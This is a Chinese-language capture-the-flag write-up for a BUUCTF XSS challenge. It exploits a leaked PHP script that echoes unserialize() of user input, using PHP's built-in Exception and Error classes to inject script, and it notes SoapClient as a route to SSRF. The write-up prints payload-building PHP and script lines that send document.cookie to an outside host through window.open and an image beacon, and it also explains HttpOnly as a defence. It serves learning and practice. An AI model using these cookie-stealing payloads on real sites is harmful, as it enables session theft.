知识点:
- PHP中利用原生类的反序列化以实现XSS
启动:
git源码泄露
用githack提取源码:
<?php
$a = $_GET['yds_is_so_beautiful'];
echo unserialize($a);
反序列化前面有echo 考虑调用 __toString()方法。
但是不知道类。上网搜资料后发现,php自身带着许多原生类。
其中有用的包括:
-
调用__call()方法的时候
有SoapClient 类 ,
可用于php5、php7,
可以形成SSRF漏洞。 -
调用__toString()方法的时候
有Error类和Exception类两个异常类
Error仅可用在php7,Exception可用在php5、php7
可以形成xss漏洞
php 的原生类中的Error 和Exception 中内置了toString 方法, 可能造成xss漏洞。
可以利用
<?php
$a = new Exception("<script>alert(1)</script>");
echo urlencode(serialize($a));
?>
成功回显
也是成功弹窗了,但是怎么弄到flag还是很迷。使用alert(document.cookie)发现为空.
去查了一下,当时的比赛给了个hint:
[hint for xss之光] 哥,你就把cookie打出去,就有惊喜
说明通过跳转把cookie打出去。。其实我自己也还是不太懂,因为javascript没学过。。。。看了一下大师傅们的姿势:
可能开启了httponly
使用带参数打开新窗口的方法获得cookie得到flag
或者在请求头中可以找到
<script>window.open('http://a0a58185-02d8-4b85-8dbb-f5a991c8b45c.node3.buuoj.cn/?'+document.cookie);</script>
或者
<script>window.location.href='baidu.com'</script>
<?php
$a = new Exception("<script>window.open('http://a0a58185-02d8-4b85-8dbb-f5a991c8b45c.node3.buuoj.cn/?'+document.cookie);</script>");
echo urlencode(serialize($a));
?>
还有的大师傅没有利用PHP的原生类,直接打cookie也可以:
<?php
$s = '<script>var img=document.createElement("img");img.src="http://f7ffa642-8f7f-4879-bc49-e75d26e7c2bc.node3.buuoj.cn/a?"+escape(document.cookie);</script>';
echo serialize($s);
最后还有的师傅提到了httponly的问题。既然让我们把cookie打出去,说明flag是在cookie里的,但是直接查却查不到:
- 如果cookie中设置了HttpOnly属性,那么通过js脚本将无法读取到cookie信息,这样能有效的防止XSS攻击,窃取cookie内容,这样就增加了cookie的安全性,即便是这样,也不要将重要信息存入cookie。
也提到了万一有的出题人忘记了设httponly这件事的话,XSS这样的题目可以控制台直接出cookie,不过这种情况几乎不可能出现。
参考文献:反序列化之PHP原生类的利用